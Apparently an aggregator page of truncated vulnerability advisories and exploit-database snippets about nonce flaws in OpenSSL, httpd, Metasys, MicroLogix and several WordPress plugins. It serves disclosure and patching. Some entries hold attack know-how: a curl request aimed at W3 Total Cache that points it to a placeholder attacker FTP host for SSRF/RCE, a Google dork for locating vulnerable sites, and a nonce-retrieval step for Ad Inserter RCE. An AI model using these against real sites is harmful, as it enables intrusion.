Johnson Controls Metasys

1. EXECUTIVE SUMMARY CVSS v3 6.8 ATTENTION: Exploitable remotely Vendor: Johnson Controls Equipment: Metasys Vulnerabilities: Reusing a Nonce, Key Pair in Encryption; Use of Hard-coded Cryptographic Key 2. RISK EVALUATION Successful exploitation of these vulnerabilities could be leveraged by an...

WordPress Download Manager 2.5 Cross Site Request Forgery

Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5 Google Dork: inurl:"/wp-content/plugins/download-manager Date: 24 may, 2019 Exploit Author: Princy Edward Exploit Author Blog : https://prinyedward.blogspot.com/ Vendor Homepage: https://www.wpdownloadmanager.com/ Softwa...

WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery

WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5 Google Dork: inurl:"/wp-content/plugins/download-manager Date: 24 may, 2019 Exploit Author: Princy Edward Exploit Author Blog :...

WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery

Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5 Google Dork: inurl:"/wp-content/plugins/download-manager Date: 24 may, 2019 Exploit Author: Princy Edward Exploit Author Blog : https://prinyedward.blogspot.com/ Vendor Homepage: https://www.wpdownloadmanager.com/ Softwa...

Oracle Linux 7 : httpd (ELSA-2019-1898)

The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2019-1898 advisory. 2.4.6-89.0.1 - replace index.html with Oracle's index page oracleindex.html 2.4.6-89.1 - Resolves: 1719722 - CVE-2018-1312 httpd: Weak Digest auth nonce...

Low: Red Hat Security Advisory: httpd security update

An update for httpd is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE...

httpd: Weak Digest auth nonce generation in mod_auth_digest

In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent reply attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common Digest authentication configuration, HTTP requests could be replayed...

Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution

The Ad Inserter – Ad Manager & AdSense Ads WordPress plugin was affected by an Authenticated Remote Code Execution security vulnerability. The nonce aicheck in the final request can be obtained by querying the homepage with the AIWPDEBUGGING cookie set to 2. Then, use an account with a role as lo...

WooCommerce <= 3.6.4 - Cross-Site Request Forgery (CSRF) & File Type Check

Changelog mentions: Security – Introduce file type check for tax rate importer. Security – Added nonce check to CSV importer actions. RIPS Tech later released an advisory detailing the vulnerability, which can be found in the references...

OpenSSL: ChaCha20-Poly1305 with long nonces (CVE-2019-1543) - Windows

OpenSSL is prone to a vulnerability which allows a nonce reuse. SPDX-FileCopyrightText: 2019 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:openssl:openssl";...

Debian DSA-4475-1 : openssl - security update

Joran Dirk Greef discovered that overly long nonces used with ChaCha20-Poly1305 were incorrectly processed and could result in nonce reuse. This doesn't affect OpenSSL-internal uses of ChaCha20-Poly1305 such as TLS. C Tenable Network Security, Inc. The descriptive text and package checks in this...

[SECURITY] [DSA 4475-1] openssl security update

------------------------------------------------------------------------- Debian Security Advisory DSA-4475-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff July 01, 2019 https://www.debian.org/security/faq -...

[ASA-201906-6] lib32-openssl: information disclosure

Arch Linux Security Advisory ASA-201906-6 ========================================= Severity: Low Date : 2019-06-11 CVE-ID : CVE-2019-1543 Package : lib32-openssl Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-920 Summary ======= The package lib32-openssl...

[ASA-201906-7] openssl: information disclosure

Arch Linux Security Advisory ASA-201906-7 ========================================= Severity: Low Date : 2019-06-11 CVE-ID : CVE-2019-1543 Package : openssl Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-919 Summary ======= The package openssl before version...

OpenSSL 1.1.0 < 1.1.0k Vulnerability

The version of OpenSSL installed on the remote host is prior to 1.1.0k. It is, therefore, affected by a vulnerability as referenced in the 1.1.0k advisory. - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce...

OpenSSL 1.1.1 < 1.1.1c Vulnerability

The version of OpenSSL installed on the remote host is prior to 1.1.1c. It is, therefore, affected by a vulnerability as referenced in the 1.1.1c advisory. - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce...

CVE-2019-11231

An issue was discovered in GetSimple CMS through 3.3.15. insufficient input sanitation in the theme-edit.php file allows upload of files with arbitrary content PHP code, for example. This vulnerability is triggered by an authenticated user; however, authentication can be bypassed. According to th...

Rockwell Automation/Allen-Bradley MicroLogix Controllers <= 16.00 Nonce Key Pair Reuse

Binary data 720126.prm...

W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar

The implementation of opcacheflushfile calls fileexists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...

EulerOS 2.0 SP3 : openssl110f (EulerOS-SA-2019-1328)

According to the version of the openssl110f packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value...